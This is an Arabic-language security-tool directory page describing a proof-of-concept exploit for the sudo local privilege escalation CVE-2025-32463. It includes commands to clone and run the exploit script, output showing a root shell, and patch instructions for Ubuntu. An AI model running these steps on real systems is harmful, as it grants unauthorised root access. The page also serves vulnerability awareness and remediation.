Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32463 — إثبات مفهوم لاستغلال CVE-2025-32463، وهو تصعيد صلاحيات محلي في إصدارات sudo 1.9.14-1.9.17، مع مكتبة مُجمّعة مسبقًا وتعليمات المعالجة. | Kitploit
أدوات/GitHubGitHub/khoazero123/cve-2025-32463
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالأوراق والأبحاثالتعلم والتعليم
GitHubkhoazero123/cve-2025-32463

CVE-2025-32463

إثبات مفهوم لاستغلال CVE-2025-32463، وهو تصعيد صلاحيات محلي في إصدارات sudo 1.9.14-1.9.17، مع مكتبة مُجمّعة مسبقًا وتعليمات المعالجة.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-32463 – استغلال رفع الصلاحيات في Sudo (PoC) مع مكتبة مُجمّعة مسبقًا

يحتوي هذا المستودع على إثبات مفهوم (PoC) لاستغلال ثغرة CVE-2025-32463، وهي ثغرة رفع صلاحيات محلية في sudo اكتشفها Rich Mirch.

الإسناد

https://github.com/kh4sh3i/CVE-2025-32463

⚠️ إخلاء مسؤولية

هذا الإثبات هو لأغراض تعليمية والاختبار المصرح به فقط. لا تستخدم هذا الكود على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.


🔧 المتطلبات

  • sudo مع دعم chroot (-R): الإصدار 1.9.14 إلى 1.9.17
  • تفعيل nsswitch

🚀 كيفية تشغيل الإثبات

root@kitploit:~
git clone https://github.com/zinzloun/CVE-2025-32463.git
cd CVE-2025-32463

تحقق مما إذا كان المستخدم الحالي لديه صلاحيات منخفضة

root@kitploit:~
:~/CVE-2025-32463$ id
uid=1001(poc) gid=1001(poc) groups=1001(poc),100(users)

تحقق من المتطلبات

root@kitploit:~
:~/CVE-2025-32463$ sudo --version
Sudo version 1.9.15p5
...
:~/CVE-2025-32463$ ls -al /etc/nsswitch.conf
-rw-r--r-- 1 root root 526 Feb 16 20:57 /etc/nsswitch.conf

شغّل الاستغلال

root@kitploit:~
:~/CVE-2025-32463$ chmod +x poc.sh && ./poc.sh
woot!
root@ubutes01:/# id
uid=0(root) gid=0(root) groups=0(root),100(users),1001(poc)

🚒 المعالجة على Ubuntu 24.04 LTS

  • للأنظمة المتصلة بالإنترنت، فقط شغّل

    root@kitploit:~
    sudo apt update && sudo apt upgrade
    
  • للأنظمة المعزولة عن الشبكة: يمكنك الحصول على أحدث حزمة sudo من هنا: https://github.com/sudo-project/sudo/releases/download/v1.9.17p1/sudo_1.9.17-2_ubu2404_amd64.deb. بعد نقل الحزمة إلى النظام المستهدف، فقط شغّل:

    root@kitploit:~
     sudo dpkg -i sudo_1.9.17-2_ubu2404_amd64.deb
    
تنزيل الأداة